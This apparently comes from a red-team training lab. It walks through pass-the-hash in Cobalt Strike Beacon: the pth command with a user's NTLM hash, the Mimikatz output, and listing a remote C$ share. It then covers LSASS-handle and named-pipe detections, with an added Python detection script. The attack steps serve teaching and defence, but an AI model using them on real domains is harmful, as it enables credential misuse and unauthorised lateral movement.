Pass the hash is a technique that allows you to authenticate to a Windows service using the NTLM hash of a user's password. It works by starting a new logon session with a fake identity and then replacing the session information with the domain, username and NTLM hash provided.
Beacon has a dedicated pth command which executes Mimikatz in the background.
This command requires elevated privileges.
First, attempt to list the C$ share of the WEB machine - this will fail because bfarmer is not a local admin there.
beacon> getuid
[*] You are DEV\bfarmer (admin)
beacon> ls \\web.dev.cyberbotic.io\c$
[-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
Then run the pth command with jking's username and NTLM hash.
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
user : jking
domain : DEV
program : C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08
impers. : no
NTLM : 59fc0f884922b4ce376051134c71e22c
| PID 1932
| TID 6600
| LSA Process is now R/W
| LUID 0 ; 7479840 (00000000:00722220)
\_ msv1_0 - data copy @ 000001F6344B3D20 : OK !
\_ kerberos - data copy @ 000001F6345BD7C8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001F6344C6128 (32) -> null
We can see that the command Mimikatz runs passes the new credentials over a named pipe, which Beacon then impersonates automatically. We can then attempt to list the C$ share again, which will succeed.
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 18:50:13 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 18:58:09 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 11:02:25 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 08/31/2022 17:40:32 ProgramData
dir 08/15/2022 18:31:08 Recovery
dir 08/30/2022 11:16:24 System Volume Information
dir 08/30/2022 17:51:08 Users
dir 08/30/2022 20:19:27 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/01/2022 07:26:41 DumpStack.log.tmp
384mb fil 09/01/2022 07:26:41 pagefile.sys
To "drop" impersonation afterwards, use the rev2self command.
beacon> rev2self
[*] Tasked beacon to revert token
beacon> ls \\web.dev.cyberbotic.io\c$
[-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
OPSEC
Two opportunities to detect PTH are the R/W handle to LSASS, and the echo foo > \\.\pipe\bar pattern in command-line logs.
The former is already part of the "Suspicious Handle to LSASS" saved search. This time we see an access mask of 0x1038. This is a combination of PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_WRITE (0x0020), PROCESS_VM_READ (0x0010) and PROCESS_VM_OPERATION (0x0008).
The latter can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\\.\pipe\".
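As an added illustration of the two OPSEC detections above (not code from the original page, and not the saved searches themselves), the following Python decodes the 0x1038 access mask into its PROCESS_* components and runs both rules over a handful of constructed events. The event dictionaries are a hypothetical, Sysmon-like shape (Event ID 10 for ProcessAccess with GrantedAccess/TargetImage, Event ID 1 for ProcessCreate with CommandLine); the source image on the LSASS event is a placeholder, and the command line is the one Mimikatz showed on the page.

```python
import re

# PROCESS_* access rights named in the OPSEC section (values from the Win32 API).
PROCESS_ACCESS_RIGHTS = {
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Read *and* write into LSASS memory: the combination that distinguishes the
# 0x1038 handle seen on the page from a read-only query such as 0x1010.
LSASS_RW_BITS = 0x0008 | 0x0010 | 0x0020


def decode_access_mask(mask):
    """Return the known PROCESS_* right names set in an access mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]


def is_suspicious_lsass_handle(event):
    """Event ID 10: target is lsass.exe and the granted access includes VM read + write + operation."""
    if event.get("event_id") != 10:
        return False
    target = event.get("target_image", "").lower()
    granted = event.get("granted_access", 0)
    return target.endswith("\\lsass.exe") and (granted & LSASS_RW_BITS) == LSASS_RW_BITS


def matches_pipe_search(cmdline):
    """The page's saved search as stated: arguments contain "echo", ">" and "\\.\pipe\"."""
    lowered = cmdline.lower()
    return "echo" in lowered and ">" in lowered and "\\\\.\\pipe\\" in lowered


# Tighter form of the same rule: 'echo <token> > \\.\pipe\<name>', so an ordinary
# "echo done > C:\temp\out.txt" does not fire.
PIPE_ECHO_RE = re.compile(r"\becho\s+\S+\s*>\s*\\\\\.\\pipe\\\S+", re.IGNORECASE)


def is_named_pipe_impersonation(event):
    """Event ID 1: command line matches the echo-to-named-pipe pattern."""
    if event.get("event_id") != 1:
        return False
    return bool(PIPE_ECHO_RE.search(event.get("command_line", "")))


def triage(events):
    """Return (rule_name, event) pairs for every event that hits one of the two detections."""
    hits = []
    for ev in events:
        if is_suspicious_lsass_handle(ev):
            hits.append(("suspicious_lsass_handle", ev))
        if is_named_pipe_impersonation(ev):
            hits.append(("named_pipe_impersonation", ev))
    return hits


# Constructed sample events (hypothetical Sysmon-like shape).
SAMPLE_EVENTS = [
    # The pth handle from the page: access mask 0x1038. Source image is a placeholder.
    {"event_id": 10, "source_image": r"C:\placeholder\beacon-host.exe",
     "target_image": r"C:\Windows\system32\lsass.exe", "granted_access": 0x1038},
    # A read-only query of LSASS (no PROCESS_VM_WRITE); should not fire.
    {"event_id": 10, "source_image": r"C:\Windows\System32\taskmgr.exe",
     "target_image": r"C:\Windows\system32\lsass.exe", "granted_access": 0x1010},
    # The program line Mimikatz printed on the page.
    {"event_id": 1, "image": r"C:\Windows\system32\cmd.exe",
     "command_line": r"C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08"},
    # Ordinary echo redirection to a file; should not fire.
    {"event_id": 1, "image": r"C:\Windows\system32\cmd.exe",
     "command_line": r"C:\Windows\system32\cmd.exe /c echo done > C:\temp\out.txt"},
]


if __name__ == "__main__":
    print("0x1038 =", " | ".join(decode_access_mask(0x1038)))
    for rule, ev in triage(SAMPLE_EVENTS):
        print(rule, "->", ev.get("source_image") or ev.get("command_line"))
```

Only the first and third constructed events produce a hit: the 0x1010 handle lacks PROCESS_VM_WRITE, and the plain file redirection never references \\.\pipe\. The substring version mirrors the saved search exactly; the regex is the stricter variant you would move to once the looser one has been tuned against your own baseline.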